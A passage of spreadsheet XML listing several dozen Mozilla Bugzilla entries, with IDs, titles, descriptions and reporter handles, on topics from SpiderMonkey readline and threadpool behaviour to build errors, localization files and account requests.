* The spec has a cache selection algorithm which verifies during parsing that the document was loaded from the right cache.  This patch just assumes we loaded from the right cache.
* Opportunistic caching/whitelisting aren't implemented in this patch.</t>
  </si>
  <si>
    <t>CORE-513948</t>
  </si>
  <si>
    <t>Use TIS APIs directly</t>
  </si>
  <si>
    <t>We are currently load the TIS APIs.
http://mxr.mozilla.org/mozilla-central/source/widget/src/cocoa/nsChildView.mm#514
But they are needed for 10.4 support. So we can use TIS APIs directly now.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-686164</t>
  </si>
  <si>
    <t>es-CL / Spanish (Chile)</t>
  </si>
  <si>
    <t>Updated es-CL main.lang file</t>
  </si>
  <si>
    <t>Created attachment 559720
updated main.lang
User Agent: Mozilla/5.0 (Windows NT 6.1 rv:9.0a1) Gecko/20110909 Firefox/9.0a1
Build ID: 20110909030839
Steps to reproduce:
Translated a few strings from main.lang and added {ok} to others</t>
  </si>
  <si>
    <t>ravmn</t>
  </si>
  <si>
    <t>CORE-355827</t>
  </si>
  <si>
    <t>SpiderMonkey's readline() can't distinguish EOF</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.4) Gecko/20060613 Camino/1.0.2
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.4) Gecko/20060613 Camino/1.0.2
SpiderMonkey's readline() function returns empty string at the end of flie.
However we can't distinguish between  and EOF.
I think readline() must returns null at the end of file.
Reproducible: Always
Steps to Reproduce:
% cat ~/a.js
for (var i = 0 i &lt; 3 i++) {
   var ln = readline()
   print(typeof ln + \t' + ln + ')
}
% echo | ./Darwin_DBG.OBJ/js ~/a.js
string  ''
string  ''
string  ''
%</t>
  </si>
  <si>
    <t>kzys</t>
  </si>
  <si>
    <t>CLOUD_SERVICES-482178</t>
  </si>
  <si>
    <t>Clean up services -&gt; lazy services</t>
  </si>
  <si>
    <t>Various places do their own laziness but this could be consolidated in the Svc object from util.js.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-885556</t>
  </si>
  <si>
    <t>[Leo] Please update the leo blobs to v08e image blobs</t>
  </si>
  <si>
    <t>as per above.  I will be sending aki the blobs.</t>
  </si>
  <si>
    <t>CORE-158937</t>
  </si>
  <si>
    <t>comment wrong</t>
  </si>
  <si>
    <t>the comment reads // BUTTON CONSTRUCTION however the code says:
else if (aTag == nsXULAtoms::autorepeatbutton) {
(see also line 5345)
should probably be changed to AUTOREPEATBUTTON</t>
  </si>
  <si>
    <t>TOOLKIT-311595</t>
  </si>
  <si>
    <t>Cannot use bouncer to serve mar files</t>
  </si>
  <si>
    <t>Cannot use bouncer to server mar files
The incremental downloader cannot handle HTTP redirects.  The problem is that
when nsHttpChannel.cpp follows a redirect it does not propogate any
user-defined headers.  In this case it is the Range header that is so crucial.
 Without it we get a 200 response which triggers bug 306170.
An easy solution would be to intercept OnChannelRedirect and then add the Range
header on the newly created channel.  It might also make sense to just make
nsHttpChannel.cpp do this by default since this problem also likely impacts the
Adobe Acrobat plugin as well as XMLHttpRequest consumers that need to set
request headers.</t>
  </si>
  <si>
    <t>TOOLKIT-372225</t>
  </si>
  <si>
    <t>safe browsing repeats its work N times where N==the number of toplevel windows open</t>
  </si>
  <si>
    <t>Each time I navigate to a new page nsDocNavStartProgressListener::Observe gets to the mCallback-&gt;OnDocNavStart line (there are some extra calls blocked by the isSpurious check) once for each toplevel window that is open.  It seems like it should be doing this work only once.
Steps to reproduce:
 1. open 50 firefox windows
 2. in one of them load attachment 253740
 3. right click on one of the IMAGE 1 or IMAGE 2 links and open it in a new tab
Actual results:  CPU is pegged for 20 seconds or so although I can interact with the browser (although it's sluggish)
Expected results:  CPU not pegged for 20 seconds.  Safe browsing code doesn't repeat its work once per top level window.</t>
  </si>
  <si>
    <t>MARKETING-737619</t>
  </si>
  <si>
    <t>Copy</t>
  </si>
  <si>
    <t>[3.6 EOL/Start Page Migration] New copy</t>
  </si>
  <si>
    <t>Please create new copy for the custom version of the start page Ty is working on creating. 
What the hell are you talking about? Project wiki: 
https://wiki.mozilla.org/Engagement/Product_Marketing/3.6_Upgrade/StartPage
Design Guidance:
https://wiki.mozilla.org/Engagement/Product_Marketing/3.6_Upgrade/StartPage#Visual_Design_Requirements
Extra Copy Guidance:
Let's be very urgent without being doomsday scary. Having two different versions would be great each of varying urgency. 
Main message: your browser is out of date - upgrade now. LoMo - feel free to expand on positioning here!
This will be l10n-ed so please make world ready fewer words the better. 
Timeline - final creative is due next week (Thursday I believe) so having them by early next week would be good.</t>
  </si>
  <si>
    <t>matej</t>
  </si>
  <si>
    <t>lforrest</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-499145</t>
  </si>
  <si>
    <t>[silme] Create silme.format.l20n.serializer file in order to write a LOL files</t>
  </si>
  <si>
    <t>Presently Silme does not support writing l20n files.  When originally working on the l20n format for Silme the grammar/semantics for l20n were not finalized.  
We might consider creating silme.format.l20n.serializer out of silme.format.l20n.Structure since this file exists.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-441708</t>
  </si>
  <si>
    <t>Maintenance Scripts</t>
  </si>
  <si>
    <t>we should write unit tests for advanced search.</t>
  </si>
  <si>
    <t>/site/en-US/firefox/tests?case=controllers%2Fsearch_controller.test.php
is now somewhat obsolete since advance search has been added. These tests need to be updated. Stephend is also working on selenium tests for search.</t>
  </si>
  <si>
    <t>WEBMAKER_GRAVEYARD-883038</t>
  </si>
  <si>
    <t>Events</t>
  </si>
  <si>
    <t>Make text in events-map pins smaller.</t>
  </si>
  <si>
    <t>From #882135 The number needs to be 2pt sizes smaller.</t>
  </si>
  <si>
    <t>hike</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-239018</t>
  </si>
  <si>
    <t>Tinderbox needs to show the Date along with time on the top of the page</t>
  </si>
  <si>
    <t>Right now Tinderbox shows only time on the top of the page. This is rather
uninformative --- it would be nice to see the date as well and I see no reason
why date should not be included there. Patch to follow.</t>
  </si>
  <si>
    <t>cnst+bmo</t>
  </si>
  <si>
    <t>CORE-285212</t>
  </si>
  <si>
    <t>Crash [@ nsFrameList::PullFrame ] locally [@ nsHTMLReflowState::ComputePadding ] remotely</t>
  </si>
  <si>
    <t>The soon to be attached simplified testcase causes a crash @
nsFrameList::PullFrame. I thought I had filed this previously but I could not
find a bug for nsFrameList::PullFrame
http://talkback-public.mozilla.org/talkback/fastfind.jsp?search=2&amp;type=iid&amp;id=TB4184569M</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-225754</t>
  </si>
  <si>
    <t>Fix to sentence describing how junk mail filters may detect viruses</t>
  </si>
  <si>
    <t>Sentence as published makes no sense.</t>
  </si>
  <si>
    <t>bplatt</t>
  </si>
  <si>
    <t>BUGZILLA-236926</t>
  </si>
  <si>
    <t>buglist.cgi isn't using $cgi-&gt;header</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7b) Gecko/20040302 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7b) Gecko/20040302 Firefox/0.8.0+
I use bugzilla-2.17.7. Every script except buglist.cgi somehow automagically
knows that I configured my Apache to send charset=utf-8. Buglist.cgi sends
ISO-8859-5 instead.
I've found and fixed the problem on my installation:
showbug.cgi line 363
---------------------
was:
  print Content-Type: text/html\n\n
replaced with:
  print Bugzilla-&gt;cgi-&gt;header()
showbug.cgi line 860
---------------------
was:
  $contenttype = text/html
replaced with:
  $contenttype = text/html charset=utf-8
Sorry I'm not so familiar with cvs to make a proper patch. And also I'm at all
not good at Perl and do not know where to get just a server's charset (not
entire header) to avoid hard-coding 'utf-8'. But I hope just finding places will
help :-).
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>Maniac</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-444483</t>
  </si>
  <si>
    <t>talos trunk qm-pmac03 has fallen and it can't get up</t>
  </si>
  <si>
    <t>The 2am 2008-07-09 run failed looking like it maybe crashed at the end of twinopen even though tdhtml got the blame but then it apparently left something (hung process crash report dialog whatever) hanging around so every run since has failed out at the start.</t>
  </si>
  <si>
    <t>CORE-76198</t>
  </si>
  <si>
    <t>Threadpool optimistically kills worker threads</t>
  </si>
  <si>
    <t>SUMMARY
The threadpool optimistically kills worker threads as soon as the total number 
of threads is greater than the minimun limit.  
The file transport uses the thread pool for its worker threads.  During startup 
there is an exceptional ammount of file transport activity.  For every file that 
is loaded in there must exist a worker thread in the threadpool.  The file 
transport sets min and max number for the number of threads.  The current logic 
in the threadpool is that it will spawn new thread for all requests up to the 
limit. When the worker thread when finished will check to see if there are any 
pending requests.  If there are none and there are more threads in the 
threadpool than the set lower limit the thread immeditely exits.  
Because of this algorithm there is alot of turnover in that pool.  The file 
transport could just raise the lower limit so that there are more persistant 
threads however this would just add to bloat since these extra thread are 
primarly needed for startup.
Another better solution would be to include a delay so that we can catch any 
additional request that may come in.  
For example:
From a normal startup to ftp://ftp.netscape.com.org there are 73 new threads 
created and 72 threads deleted.  (This is completely insane) After putting a 5 
second wait there are only 13 new threads created and 12 deleted.  This removes 
60 thread creation/deletions.  
Going to http://www.mozilla.org creates 49 threads.  Adding a 5 second delay 
reduces this to creating only 6 threads.
Clearly there should be some period of wait time before the thread exist so 
that we don't get a huge number of thread exits followed by an immeditate start.
I am not sure exactly what this will trim off of startup time.  I ran some basic 
timing tests.  On a P3 dual 500 (windows 2k 128mb ram) it take only 2ms to 
create 10 threads. However this is not a accurate picture since creation of a 
thread doesn't really do much but schedules it.  I also looked at how long it 
takes from the creation of a thread to its actual running.  The data indicates 
that it takes longer as there are more threads.  With 3 threads present it 
takes on average 200 milliseconds from the time PR_CreateThread() is called to 
the time the user defined function is entered and does a printf().  Maybe 
somebody here has better knowledge of thread startup preformance.
Attached in my proposed change.</t>
  </si>
  <si>
    <t>TOOLKIT-516701</t>
  </si>
  <si>
    <t>Checkboxes and radios need to be updated to lwtheme</t>
  </si>
  <si>
    <t>From bug 513461 comment 23:
I've also noticed a small glitch with checkboxes in gnomestripe which is not
caused by your changes though. We're changing the background and text color on
hover but still inherit the text shadow. Could be fixed by adding
text-shadow:none in checkbox.css:
114 checkbox:not([disabled=true]):hover {
115   color: -moz-buttonhovertext
116 }
The same applies to radio.css. Both could be moved to a separate bug if you
don't want to touch it.
Bug Filed.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-495513</t>
  </si>
  <si>
    <t>Get better symbols for 3rd-party frameworks</t>
  </si>
  <si>
    <t>It would be nice if we could get good symbols for Growl Sparkle and SMC. Not a huge deal but if it's just a minor tweak to a config file it's probably worth maintaining forked (especially Sparkle since we already fork their configs and that's the most important).</t>
  </si>
  <si>
    <t>CORE-382865</t>
  </si>
  <si>
    <t>Null out param strings in ISimpleDOM* support</t>
  </si>
  <si>
    <t>If we return an error in something that returns a string we should also return a NULL string.</t>
  </si>
  <si>
    <t>CORE-198251</t>
  </si>
  <si>
    <t>myFrameset.appendChild(d.createElement(frame)) doesn't display contents.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4a) Gecko/20030315
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.4a) Gecko/20030315
If I create frames with the DOM API calls and append them to a Frameset they
are not visible.  There are different forms of this problem depending on whether
the file is saved as .html or .xhtml. In a .html file I can cause the frames to
display content if I .setAttribute(cols**) after I append the new frames.
In .xhtml this doesn't work.
Reproducible: Always
Steps to Reproduce:
1. Create a frameset using a tag including an onload=doLoad(this)
2. In the doLoad() create two frames and set the src attributes to good URLs.
3. load the page
Actual Results:  
The window remains empty.
Expected Results:  
I expect to see the contents of the URLs displayed in the frames.
This is really just a step toward what I really want to do and that is to set
the location of the contentWindow properties of the frames with javascript.  No
matter what happens in the above example I don't get a contentWindow object. 
This I find this to be fairly serious because it has the potential for wasting a
lot of time on the part of a developer who wants to do things this way.  It
should work or be documented that it doesn't.
Example code forthcomming.</t>
  </si>
  <si>
    <t>hattons</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-239473</t>
  </si>
  <si>
    <t>Crash on Exit when emptying trash</t>
  </si>
  <si>
    <t>and you have the hidden pref turned on to prompt if the trash has folders marked
for deletion.
(and you have a folder in trash)</t>
  </si>
  <si>
    <t>SEAMONKEY-109557</t>
  </si>
  <si>
    <t>Mail message display time depends on amount of messages in folder</t>
  </si>
  <si>
    <t>The time it takes to open the message display window is dependent on how many 
messages you have in the folder that contains the message you're opening.  For 
example I notice that if I double click a message in my bugmail folder (with 
36610 messages) there's a freeze before the message window opens but the 
delay is hardly noticeable if I move the message to my Inbox (1334 messages) 
and then double click it.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-409216</t>
  </si>
  <si>
    <t>Baseline JIT (CodegenLIR)</t>
  </si>
  <si>
    <t>TC: investigate stack alignment for jitted code</t>
  </si>
  <si>
    <t>At least windows and possibly linux don't guarantee stack pointer alignment in their ABI.  Investigate adding dynamic alignment to the prologue/epilogue code to ensure spilled doubles and 8-aligned double args are 8-aligned.
On Darwin ESP is 16-aligned double check to make sure spilled varibles are at least 8-aligned within the stack frame.
Dupe of this bug tracked in bugs.adobe.com:
https://bugs.adobe.com/jira/browse/ASC-2273</t>
  </si>
  <si>
    <t>wsharp</t>
  </si>
  <si>
    <t>edwsmith</t>
  </si>
  <si>
    <t>CORE-306353</t>
  </si>
  <si>
    <t>XHTML parsed as XML with doctype has trilicense/other comments from dtd in DOM</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20050815 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20050815 Firefox/1.0+
My web server happens to serve files ending in .xml as text/xml and xhtml may
be served as xml (although that is not recommended).  Deer Park Alpha 2 decides
to parse text/xml documents with an XHTML doctype as XHTML but display it as
XML and in the process unrolls some internal XML into the document.  The end
result is that my document which is not in any way covered by the MPL/GPL/LGPL
is shown as an XML parse tree /with an MPL/GPL block that isn't supposed to be
there/.
It is technically allowable to treat my xml-served XHTML as plain old style-less
XML.  However if that is the case it should not be combined with internal GPL'd
documents.  Alternatively it could be displayed and rendered properly as XHTML
which would be preferable but is not at all required.
See http://www.w3.org/TR/xhtml-media-types/#text-xml .
Representing a non-GPL'd document as a GPL'd document is a potential legal
liability so this really ought to be fixed altough it doesn't come up much in
practice.
Reproducible: Always
Steps to Reproduce:
View http://www.andrew.cmu.edu/user/bmills/test.xml .
Actual Results:  
An XML parse tree is shown including several spurious comments with the MPL/GPL
and other comments not in the actual document.
Expected Results:  
EITHER correctly render the XHTML as XHTML OR display the correct XML parse
tree WITHOUT spurious comments.</t>
  </si>
  <si>
    <t>bmills</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-346145</t>
  </si>
  <si>
    <t>Use SDKROOT_i386 in project.pbxproj</t>
  </si>
  <si>
    <t>C'mon get with the program</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-391937</t>
  </si>
  <si>
    <t>Linux x86_64 startup-notification relocation error gcc-4.2.x</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9a8pre) Gecko/2007081215 Minefield/3.0a8pre
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9a8pre) Gecko/2007081215 Minefield/3.0a8pre
/usr/lib/gcc/x86_64-pc-linux-gnu/4.2.0/../../../../x86_64-pc-linux-gnu/bin/ld: n
sWindow.o: relocation R_X86_64_PC32 against `sn_display_new' can not be used whe
n making a shared object recompile with -fPIC
/usr/lib/gcc/x86_64-pc-linux-gnu/4.2.0/../../../../x86_64-pc-linux-gnu/bin/ld: f
inal link failed: Bad value
Reproducible: Always
Steps to Reproduce:
1. compile minefield with gcc &gt; 4.2
2.
3.
Actual Results:  
relocation error
Expected Results:  
should compile</t>
  </si>
  <si>
    <t>CORE-96273</t>
  </si>
  <si>
    <t>Implement support for tabIndex</t>
  </si>
  <si>
    <t>Add the property to the XUL element and make sure we support it just as HTML does.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-271684</t>
  </si>
  <si>
    <t>DOM Inspector no longer listed on module owners page</t>
  </si>
  <si>
    <t>Somehow DOM Inspector which was once upon a time listed on the Module Owners
webpage is no longer there.  As I recall this is a module owned by caillon.  I
don't remember who the peers are.
I'd like to have that restored if it should be there or if it shouldn't
clarify which module owner it belongs to.  If for no other reason than I'd like
to know who to seek reviews from...</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-361233</t>
  </si>
  <si>
    <t>Simple MAPI</t>
  </si>
  <si>
    <t>installation of 1.1b breaks mapi linkage from excel and word</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.8) Gecko/20061030 SeaMonkey/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.8) Gecko/20061030 SeaMonkey/1.0.6
after installing 1.1b can't attach documents from word or excel via mapi.
Reproducible: Always
Steps to Reproduce:
1.installed 1.1b
2.opened word
3.opened existing document
4.file/send/to mail as attachment
5. got message login failed. you must login to microsoft exchange to access your address book.
6. similar message in excel.
7. system restore corrected issue.
8. re-install of 1.1b broke it again.
(using moz for mail not outlook.)
something is obviously breaking the mapi or ldap settings in the registry.  i can offer a before-and-after export but i have no way to compare ... nor do i know what to compare ...</t>
  </si>
  <si>
    <t>blehrhof</t>
  </si>
  <si>
    <t>CORE-460364</t>
  </si>
  <si>
    <t>TM: Add support for building with icc to Makefile.ref</t>
  </si>
  <si>
    <t>Created attachment 343475
patch</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-524723</t>
  </si>
  <si>
    <t>Add Updated Firefox &amp; Thunderbird Logos to Trademark List</t>
  </si>
  <si>
    <t>1. Update Trademark List to include the updated Firefox and Thunderbird logos.
The same change may have to be made at mozilla.com if both sites aren't pulling their content from the same file or if it doesn't resolve to .org.</t>
  </si>
  <si>
    <t>cbrady</t>
  </si>
  <si>
    <t>NSS-288728</t>
  </si>
  <si>
    <t>NSSCMSRecipientID_BrandNew not handled in nss_cms_recipients_traverse</t>
  </si>
  <si>
    <t>IMO the following compiler warning warrants its own a bug. I'm not sure what
the correct handling is for this case.
cmsreclist.c: In function `nss_cms_recipients_traverse':
cmsreclist.c:85: warning: enumeration value `NSSCMSRecipientID_BrandNew' not
handled in switch</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-423850</t>
  </si>
  <si>
    <t>need a new VM for fx-linux-1.9-slave1</t>
  </si>
  <si>
    <t>For whatever reason possibly related to bug 423809 fx-linux-1.9-slave1 decided to corrupt it's / partition very badly. /etc/inittab is corrupt /bin doesn't exist anymore -- it's broken. We need to replace it with a new VM.</t>
  </si>
  <si>
    <t>THUNDERBIRD-476836</t>
  </si>
  <si>
    <t>(Activity Manager) %s should be added in plural-form messages</t>
  </si>
  <si>
    <t>This a bug is related to plural-form messages especially those located in Activity Manager.
In Arabic locale (I don't know if this applies on other locales too) for some numbers (precisely for n = 0 1 or 2) the noun that succeeds the number doesn't need any preceding number because the meaning of the number is within the noun it self i.e. if you're saying 'two-days' (it is one word in Arabic) it makes a bit non-sense to say '2 two-days'. In order to solve that if we have a plural message (let's say '%s days') '%s' is removed for entries where n = 0 1 or 2.
Now the problem is that many plural messages doesn't contain a '%s' within (e.g. 'days=daydays' in mail/chrome/messenger/activity.properties) which means that the '%s' is externally added and the localizer can't remove the '%s' for n=012.
My request is to unify the structure of localized plural messages and make sure that all of them become as 'days=%s day%s days' instead of 'days=daydays'.
Besides some other messages need to have the plural-form too (like 'autoRetry=Trying again in %S seconds' in the same file).
Note: That bug is *not* related to the plural-form rules but to the format of plural messages.
Thanks</t>
  </si>
  <si>
    <t>linux.anas</t>
  </si>
  <si>
    <t>NSS-388403</t>
  </si>
  <si>
    <t>Update Mozilla to NSS 3.12 (was: NSS trunk fails to init with Mozilla trunk)</t>
  </si>
  <si>
    <t>I assume the trunk of NSS is supposed to work with the trunk of Mozilla at least for development purposes?
That combination does not work for me.
When I try to start up SeaMonkey I get the error message about being unable to init NSS.
I traced a bit and NSS fails to load a load (module-&gt;loaded == 0).
There seems to be some corruption going on because after dismissing the error message I get a crash (in Mozilla not in NSS).
For testing I deleted the existing *.db files but I get the same broken behavior.
(I'm currently running a Firefox build and will comment whether this gives the same error. I assume it will.)</t>
  </si>
  <si>
    <t>CORE-322170</t>
  </si>
  <si>
    <t>Shockwave map doesn't appear on trunk</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.9a1) Gecko/20060102 Firefox/1.6a1
Steps to reproduce:
1. Go to http://darkwing.uoregon.edu/~atlas/europe/interactive/map32.html.
Result: no map.
Expected: map.
The Shockwave thingie on http://sdc.shockwave.com/shockwave/download/triggerpages_mmcom/default.html does work.
I only see this problem on trunk.  The page works on the Firefox 1.5.0.x branch (specifically Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8) Gecko/20051224 Firefox/1.5.)</t>
  </si>
  <si>
    <t>CORE-466254</t>
  </si>
  <si>
    <t>Workers: Implement close() and onclose handlers</t>
  </si>
  <si>
    <t>Part of the spec we didn't quite hit. Highly desired by Google and others for killing server locks and allowing cleanup.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-277023</t>
  </si>
  <si>
    <t>myflorida.com - rejects Firefox &amp; Mozilla</t>
  </si>
  <si>
    <t>MOZILLA.ORG-493727</t>
  </si>
  <si>
    <t>Create localizer LDAP/SVN account for Amitakhya Phukan</t>
  </si>
  <si>
    <t>Please create SVN account for:
Name: Amitakhya Phukan
Locale: as
email: aphukan.mozilla@gmail.com
This user needs to be added to our localizers group for SVN to commit via HTTPS with LDAP.
I believe his LDAP account was already created when his CVS/HG account was created in bug #448352 (committer's agreement sent too) but Amitakhya does not have a password for this account. If no LDAP account was created for him please create one if he has an LDAP account please reset the password and send it to him.
Thanks 
Thanks</t>
  </si>
  <si>
    <t>BUGZILLA-113646</t>
  </si>
  <si>
    <t>midair when changing assignee gives error</t>
  </si>
  <si>
    <t>I midaired while changing the assignee on a couple of the smoketest blockers
this morning and went to continue (they were just comment changes)
I got:
unknown action 'hyatt@netscape.com'</t>
  </si>
  <si>
    <t>CORE-214989</t>
  </si>
  <si>
    <t>Stretchy MathML frames don't stretch anymore</t>
  </si>
  <si>
    <t>Upshot from the recent '::-moz-' crusade. Patch coming up.</t>
  </si>
  <si>
    <t>FIREFOX-237136</t>
  </si>
  <si>
    <t>Add bookmark dialog changes position on screen when clicking Show all the bookmarks folders button</t>
  </si>
  <si>
    <t>Even if it pushes the icon of the triangle mark in an add Bookmark dialog a
bookmark folder list is not displayed.
A push on this button displays the following error messages on Java Script Console.
Error: uncaught exception: [Exception... Cannot find interface information for
parameter arg 0 [nsIXULTreeBuilder.getIndexOfResource]  nsresult: 0x80570006
(NS_ERROR_XPC_CANT_GET_PARAM_IFACE_INFO)  location: JS frame ::
chrome://browser/content/bookmarks/bookmarksTree.xml :: selectResource :: line
286  data: no]
Mac OS X 10.3.2
Use Default theme.
Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O ja-JP rv:1.7b) Gecko/20040311
Firefox/0.8.0+</t>
  </si>
  <si>
    <t>CORE-356829</t>
  </si>
  <si>
    <t>Expose 's object attribute layout-guess as false when in editable area</t>
  </si>
  <si>
    <t>While authoring screen reader users should know about all tables. This is different from the browsing case where layout tables should just be exposed as normal content.
Therefore don't expose layout-guess=true for tables in editable areas.</t>
  </si>
  <si>
    <t>CORE-529900</t>
  </si>
  <si>
    <t>64-bit - lots of assertions crashes - Assertion failed: ( int32_t(offset) == int8_t(offset) ) (../nanojit/NativeX64.cpp:206)</t>
  </si>
  <si>
    <t>A day or two ago 64-bit on 10.6 saw a lot of assertions / crashes on the fuzzers. This doesn't occur on 10.5 32-bit. Examples of assertions:
 35 Assertion failure: !JSVAL_IS_NULL(id) at ../jsscope.cpp:302
   7 Assertion failure: script-&gt;main code + script-&gt;length at ../jsopcode.cpp:5524
   5 Assertion failure: ((jsval) obj &amp; JSVAL_TAGMASK) == JSVAL_OBJECT at ../jsapi.h:204
   4 Assertion failure: HAS_FUNCTION_CLASS(callee) at ../jstracer.cpp:5350
   2 Assertion failure: HAS_FUNCTION_CLASS(*(JSObject**)slot) at ../jstracer.cpp:2945
I don't yet have a testcase - need Jesse's help.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-520406</t>
  </si>
  <si>
    <t>german umlauts are not decoded correctly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 de rv:1.9.1.3) Gecko/20090909 Fedora/3.5.3-1.fc11 Firefox/3.5.3
Build Identifier: 
Snow doesn't decode the german umlauts in the feed provided by the attached url correctly. Other newsreader like brief decode them correctly.
Reproducible: Always
Steps to Reproduce:
1. Open http://handelsblatt6.blogg.de/rss.xml
2. Subscribe to the feed using snowl
3. Open snowl news list and select the feed
4. Browse through the articles
Actual Results:  
German umlauts and some other special characters are not decoded correctly
Expected Results:  
German umlauts and some other special characters should be displayed correctly</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-355470</t>
  </si>
  <si>
    <t>rebase throwing error 99 on tinderboxes with VC8</t>
  </si>
  <si>
    <t>rebase is throwing error 99 on the tinderboxes that have been upgraded to VC8.
From sb-win32-tbox:
 echo rebasing ./dist
 rebasing ./dist
 /bin/find ./dist -name *.dll &gt; rebase.lst
 rebase -b 60000000 -R . -G rebase.lst
 REBASE: Total Size of mapping 0x0000000000670000
 REBASE: Range 0x0000000060000000 -0x0000000060670000
 make: *** [rebase] Error 99
From gaius-vm (building Minefield):
 echo rebasing ./dist
 rebasing ./dist
 /bin/find ./dist -name *.dll &gt; rebase.lst
 rebase -b 60000000 -R . -G rebase.lst
 REBASE: Total Size of mapping 0x0000000000bd0000
 REBASE: Range 0x0000000060000000 -0x0000000060bd0000
 make: *** [rebase] Error 99</t>
  </si>
  <si>
    <t>CORE-354147</t>
  </si>
  <si>
    <t xml:space="preserve"> ignoring event attributes on branch</t>
  </si>
  <si>
    <t>This simple fix was missed when upgrading the branch svg because it was part of a larger set of changes in bug 318597 which were considered inappropriate for the branch.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-276119</t>
  </si>
  <si>
    <t>workhorseproducts.com - SHTML served as text/plain</t>
  </si>
  <si>
    <t>Click on Products tab and it displays God knows what why would I switch from IE
when you can not display pages correctly ?</t>
  </si>
  <si>
    <t>felatrading</t>
  </si>
  <si>
    <t>CORE-106558</t>
  </si>
  <si>
    <t>Mozilla briefly displays  during redirects</t>
  </si>
  <si>
    <t>Redirects using Location http header result in Mozilla briefly displaying
Buildid 2001102403 on Windows
I saw it on buildid 2001102203 on linux as well
Related to bug 102737
Recent regression</t>
  </si>
  <si>
    <t>marc.loiselle</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-567154</t>
  </si>
  <si>
    <t>Configure single buildslave in production to generate nightly Windows 64-bit builds</t>
  </si>
  <si>
    <t>We've run into a bit of a chicken-and-egg problem with getting the Windows 64-bit builds into a decent state. Without builds and logs (and eventually symbols) for developers to look at we haven't been able to get much help from developers in debugging issues and getting builds to a nightly state. 
Armen has been able to generate a 64bit Windows build so he has a toolchain that works. The build crashes right away though. We don't necessarily want to deploy the current toolchain across a collection of buildslaves until we're sure generated builds are usable.
I'm going to suggest we try something new/different.
After talking with joduinn this morning we'd like to hook up Armen's single Win64 builder to production-master and have it build nightly builds on trunk. By doing this we can iterate on the toolchain as required trigger builds as required and generate builds and logs for developers to use as we go.
Once we have working builds from an agreed-upon toolchain we can scale this up.
We can put the Win64 nightly builds into the experimental/ dir until they (at least) start up. We should disable updates testing etc in the mozconfig to start.</t>
  </si>
  <si>
    <t>CORE-334935</t>
  </si>
  <si>
    <t>Array: methods on a long array cause system to hang (DOS)</t>
  </si>
  <si>
    <t>fix for bug 330812 solved DOS when Array(1 &lt;&lt; 29).sort()
but other issues remained.
* unable to catch in try{} catch(e){} block
* Array also have other methods which give prob.
steps to test
1. open long_array_dos.html
2. click Input Case : 0 link
3. click test button
4. repeat for all
BTW: Even though I am not good in CS just a question. 
For arrays having most elements empty 
why cant we have an algorithm similar to one processing sparse metrics and save memory and processing time?</t>
  </si>
  <si>
    <t>SOCORRO-703018</t>
  </si>
  <si>
    <t>Get topcrashes and reports for nightly-* development branches</t>
  </si>
  <si>
    <t>We tend to have longer-term development branches with nightly-* release channels for which we'll want to have topcrash and crash rate information for investigating specifics of them and for comparing to the standard nightly channel.
Right now we are counting all nightly* versions together but when this is being solved we should do separate reports for each of those.
At the moment this concerns nightly-ux nightly-jaegermonkey nightly-ash nightly-elm and for Fennec nightly-birch. Even if the latter will go away once it's merged to mozilla-central (hopefully soon) this will come up again and again with other branches in the future so we should have this in the middle to long term.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-374404</t>
  </si>
  <si>
    <t>Don't ship WidgetStateManager as part of toolkit</t>
  </si>
  <si>
    <t>See http://mxr.mozilla.org/seamonkey/search?string=widgetstatemanager
These two files are not actually used by either Firefox or Thunderbird.
http://mxr.mozilla.org/seamonkey/source/toolkit/content/nsWidgetStateManager.js
http://mxr.mozilla.org/seamonkey/source/toolkit/obsolete/content/widgetStateManager.js
The suite has its own version of these in xpfe/. The toolkit version should be removed.</t>
